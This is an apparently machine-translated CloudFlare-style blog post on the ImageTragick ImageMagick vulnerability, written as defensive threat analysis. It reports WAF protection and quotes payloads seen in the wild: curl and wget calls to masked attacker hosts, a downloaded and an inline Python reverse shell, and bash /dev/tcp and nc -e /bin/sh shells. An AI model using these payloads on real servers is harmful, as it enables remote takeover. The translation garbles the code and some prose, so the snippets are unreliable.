上周，流行的图像处理软件ImageMagick公开了多个漏洞。这些很快被命名为ImageTradick。虽然图像处理软件中的漏洞对网站所有者来说似乎不是问题，但实际上却是一个真正的安全问题。CloudFlare很快推出了WAF规则，以保护我们的客户免受此漏洞的影响。它是为所有启用WAF的客户自动部署的。我们知道客户升级其web服务器软件需要时间，因此WAF会在过渡期间保护他们。许多网站允许用户上传图片，而网站本身经常使用像ImageMagick这样的软件来操作这些图片。例如，如果你上传一张自己的照片作为头像使用，它很可能会被网站调整大小。ImageMagick非常受欢迎，有一些插件可以让它很容易地与PHP、Ruby、，节点.js以及其他语言，因此网站通常使用它来调整图像大小或裁剪。不幸的是，研究人员发现，通过将代码隐藏在用户上传的图像文件中，可以执行任意代码（CVE-2016-3714）。这意味着攻击者可以通过上传包含攻击者选择的代码的图像来让web服务器执行其投标。与以往一样，ImageMagick的用户必须尽快升级，以获得充分的保护。炮击2？早在2014年，我就写过另一个讨厌的代码执行漏洞，叫做Shellshock。在那篇博文中我写道：Shellshock问题是任意代码执行（ACE）漏洞的一个例子。通常，ACE漏洞攻击是在正在运行的程序上执行的，并且需要对代码执行、内存布局和汇编语言的内部进行高度复杂的理解简言之，这种类型的攻击需要专家。攻击者还将使用ACE漏洞上载或运行一个程序，该程序为他们提供了控制目标计算机的简单方法。这通常是通过运行一个"shell"来实现的。shell是可以输入和执行命令的命令行。Shellshock漏洞是一个主要问题，因为它消除了对专业知识的需要，并提供了一种简单（不幸的是，非常简单）的方法来控制另一台计算机（如web服务器）并使其运行代码。可悲的是，imageratracick也是如此：攻击者不需要复杂到可以利用它并在易受攻击的web服务器上运行任意代码。Shellshock尤其令人讨厌，因为该漏洞有多普遍；ImageTragick虽然没有那么普遍，但对于那些使用它来操纵用户上传的图像的网站来说，这是一个真正的问题。侦察当WAF规则在我们的网络上上线后，我们就开始关注CVE-2016-3714的开发。坏消息是，黑客正积极利用这个漏洞攻击网站。我收集了黑客使用的最流行的有效负载的例子。这些不是武器化的，因为我已经移除了有效载荷周围的图像包装，以确保它们不能简单地被复制和粘贴来执行攻击。我还隐藏了攻击者使用的IP地址和网站名称。CC BY 2.0图片作者：Jason Brennan最常见的有效负载包含以下代码段："填充"url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_和_no_somethingsometing_作者：_nebezial-d5彩色多普勒.jpg"卷曲"示例.com)'这个特定的有效负载不应该造成任何损害，因为curl命令只返回301移动的永久HTTP错误的文本。攻击者可能将此作为测试攻击是否在特定网站上有效的方法。一旦他们知道某个东西起作用了，他们就可以回来尝试使用更复杂的有效负载侵入服务器。下一个有效载荷看起来可能同样用于侦察：wget命令会导致404notfound错误（尽管可能在某个时刻下载了一个真正的文件）。即使出现404错误，攻击者也可以查看自己的服务器日志（位于xx.xx号.116.214）来发现有效负载工作的任何网站的IP地址。然后，他们可以返回到网站，以适当的攻击它。远程访问另一种有效载荷如下所示："填充"url(https://127.0.0.0/sdfsdf.jpg"| wget-o-a0074942。example.com/dfgdfg>"/tmp/dfgfdgffdg）"攻击者使用wget下载一个文件（可能是从他们控制的服务器）并将其保存到网站服务器上的文件中。这可能是更大规模攻击的前奏，临时文件的内容可能包含一个将在web服务器上执行的程序，使攻击者能够访问。Todd Ehlers的CC BY-SA 2.0图像一种更危险的有效载荷在周末受到了攻击者的欢迎："填充"url(https://example.com/image.jpg"| wget和python/tmp/x.pyxx.xx号.15.179 80"）'它从攻击控制的服务器下载一个名为x.py的python程序，将其保存为/tmp/x.py，然后执行它。程序的参数是要联系的机器的IP地址和端口。python代码连接到该机器，并在web服务器上为攻击者提供一个shell。此时，攻击者可以直接与web服务器交互。以下是下载程序的片段：# -*- 编码：utf-8-*-#!/usr/bin/env python"""反向连接py版本，只有linux有pty模块谷歌安全团队代码"""导入系统、操作系统、套接字shell="/bin/sh"def用法（名称）：打印"python反向连接器"print'用法：%s'%namedef main（）：如果len(系统argv) !=3:使用(系统argv[0]）系统出口()s=插座.插座(插座,socket.SOCK_流)尝试：s、 连接((系统argv[1] ，内景(系统argv[2] ））打印"连接正常"除了：打印"连接失败"系统出口()[...]pty.产卵（外壳）s、 关闭（）如果"名称"='"主视图"：主（）此有效负载的变体消除了下载python程序的需要，并将其包含在有效负载中："填充"url(https://example.com/image.jpg"|/bin/echo-e'导入套接字\x2csubprocess\x2cos；s=插座.插座(插座\x2个csocket.sock_流);s、 连接（（"xx.xx号0.24.85"\x2c443））；p=subprocess.call（\x5b"/bin/sh"\x2c"-i"\x5d）；\'>/dev/shm/a.py | python"/dev/shm/a.py）"事实证明，通过shell或其他连接访问服务器很受使用以下有效负载的攻击者的欢迎：fill'url（https://\x22 | setsid/bin/bash-i>/dev/tcp/xx.xx号.248.51/443号文件0&1"）'"填充"url(https://profile-photos.example.com/production/000/003/658/b4eb8_xtralarge.png"| nc-e/bin/shxx.xx号.151.208节第一个使用setsid创建一个新的会话，然后将bashshell连接到一个TCP连接上，并返回到黑客的服务器。第二个使用nc来尝试同样的事情。所有这些有效负载都是为了让黑客能够不受限制地访问易受攻击的web服务器。只需一次攻击，他们就可以远程访问，然后在空闲时继续进一步攻击易受攻击的web服务器。结论CloudFlare在发现漏洞和客户获得自动保护时不断更新我们的WAF。尽管如此，我们敦促ImageMagick的所有用户尽快升级。目前，我们还不知道有一个网站已经成功地使用ImageTragick进行了黑客攻击，但很明显，黑客正在积极尝试这个漏洞，因为它是新的，而且许多服务器可能还没有被修补。如果您有兴趣更详细地了解漏洞，研究人员有一套非武器化的POC可用，并有一个程序来测试您自己服务器上安装的ImageMagick版本是否存在漏洞。他们还详细描述了潜在的问题。PS CloudFlare正在伦敦、旧金山、奥斯汀、新加坡和伊利诺伊州香槟市招聘员工。